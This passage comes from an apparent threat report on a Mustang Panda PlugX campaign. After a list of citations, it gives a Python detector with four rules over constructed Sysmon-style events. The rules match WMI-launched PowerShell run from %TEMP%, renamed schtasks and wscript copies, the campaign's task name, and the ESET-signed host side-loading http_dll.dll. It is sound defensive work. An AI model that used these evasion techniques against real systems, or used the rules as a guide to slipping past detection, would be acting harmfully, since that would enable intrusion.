https://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019, https://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.</p> <p><sup>[8]</sup> “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018, https://www.mmpeacemonitor.org/1598.</p> <p><sup>[9]</sup> https://digitallibrary.un.org/record/1663461. Accessed September 18, 2019.</p> <p><sup>[10]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[11]</sup> http://www.china-zentrum.de/. 
Accessed September 18, 2019.</p> <p><sup>[12]</sup> Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.</p> <p><sup>[13]</sup> Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019, https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.</p> <p><sup>[14]</sup> Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission, accessed September 20, 2019, published February 14, 2017, https://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf. 3.</p> <p><sup>[15]</sup> Ibid.</p>
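<p>The execution chain laid out in the Technical Analysis section (an HTA run by mshta.exe, PowerShell started through WMI from a script in %TEMP%, schtasks.exe copied to %TEMP% as wtask.exe, a scheduled task named “Security Script kb00855787”, wscript.exe renamed winwsh.exe, and the ESET-signed 3.exe loading http_dll.dll) maps directly onto host-based detection logic. The Python below is an added example written for this edit, not detection content from Anomali or any vendor. It runs four rules over constructed process-creation and image-load events whose fields are modelled on what Sysmon records (Image, ParentImage, CommandLine, OriginalFileName, ImageLoaded). The WmiPrvSE.exe parent for the PowerShell process is inferred from the report’s statement that the script is launched via WMI, and the command lines in the sample events are placeholders shaped after the described behaviour, not the campaign’s actual arguments.</p>

```python
import re
from collections import namedtuple

# Event shape modelled on Sysmon process-creation (EID 1) and image-load (EID 7)
# records; only the fields the rules need are kept.
Event = namedtuple("Event", "kind image parent_image command_line original_file_name image_loaded")


def proc_event(image, parent_image, command_line, original_file_name=None):
    return Event("process", image, parent_image, command_line, original_file_name, None)


def load_event(image, image_loaded, original_file_name=None):
    return Event("image_load", image, None, None, original_file_name, image_loaded)


def basename(path):
    """Lower-cased final path component; tolerant of None and forward slashes."""
    return (path or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Indicators taken from the report.
TASK_NAME = "security script kb00855787"
RENAMED_TOOLS = {"wtask.exe": "schtasks.exe", "winwsh.exe": "wscript.exe"}
SIDELOAD_HOST_ORIGINAL = "ehttpsrv.exe"   # PE original name of the dropped 3.exe
SIDELOAD_DLL = "http_dll.dll"
TEMP_PS1 = re.compile(r'\\temp\\[^\s"]+\.ps1', re.IGNORECASE)


def check_event(e):
    """Return [(rule_name, detail), ...] for one event; empty if nothing matches."""
    hits = []
    if e.kind == "process":
        img, parent = basename(e.image), basename(e.parent_image)
        cmd = e.command_line or ""
        original = (e.original_file_name or "").lower()
        # Rule 1: PowerShell spawned by the WMI provider host, running a script out of %TEMP%.
        if img == "powershell.exe" and parent == "wmiprvse.exe" and TEMP_PS1.search(cmd):
            hits.append(("wmi_powershell_temp_script", cmd))
        # Rule 2: a copied system tool whose on-disk name differs from its PE OriginalFileName.
        if img in RENAMED_TOOLS and original == RENAMED_TOOLS[img]:
            hits.append(("renamed_system_tool", "%s is really %s" % (img, original)))
        # Rule 3: scheduled task created with the campaign's task name, whatever binary creates it.
        if "/create" in cmd.lower() and TASK_NAME in cmd.lower():
            hits.append(("campaign_task_name", cmd))
    elif e.kind == "image_load":
        original = (e.original_file_name or "").lower()
        # Rule 4: the ESET-signed host process loading http_dll.dll (PlugX DLL side-loading).
        if (basename(e.image) == "3.exe" or original == SIDELOAD_HOST_ORIGINAL) \
                and basename(e.image_loaded) == SIDELOAD_DLL:
            hits.append(("plugx_dll_sideload", "%s loaded %s" % (e.image, e.image_loaded)))
    return hits


def scan(events):
    return [hit for e in events for hit in check_event(e)]


# Constructed sample telemetry (not real logs from the campaign); the command lines
# are placeholders shaped after the behaviour described in the report.
SAMPLE_EVENTS = [
    proc_event(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
               r'mshta.exe "C:\Users\analyst\Desktop\32_1.PDF.lnk"'),
    proc_event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Windows\System32\wbem\WmiPrvSE.exe",
               r"powershell.exe -File C:\Users\analyst\AppData\Local\Temp\3.ps1"),
    proc_event(r"C:\Users\analyst\AppData\Local\Temp\wtask.exe",
               r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r'wtask.exe /create /tn "Security Script kb00855787" /tr "<placeholder>"',
               original_file_name="schtasks.exe"),
    proc_event(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    load_event(r"C:\ProgramData\Microsoft Malware Protection\GHQ\3.exe",
               r"C:\ProgramData\Microsoft Malware Protection\GHQ\http_dll.dll",
               original_file_name="EHttpSrv.exe"),
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(rule, "->", detail)
```

<p>Rules 1 and 2 are the durable ones: they key on behaviour (a WMI-launched script in a temp directory, a system tool whose file name no longer matches its PE original name) rather than on the exact task name or DLL name, which an operator can change between campaigns. Rules 3 and 4 are cheap, high-confidence matches for this specific activity and should be paired with the file hashes and C2 indicators listed above.</p>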
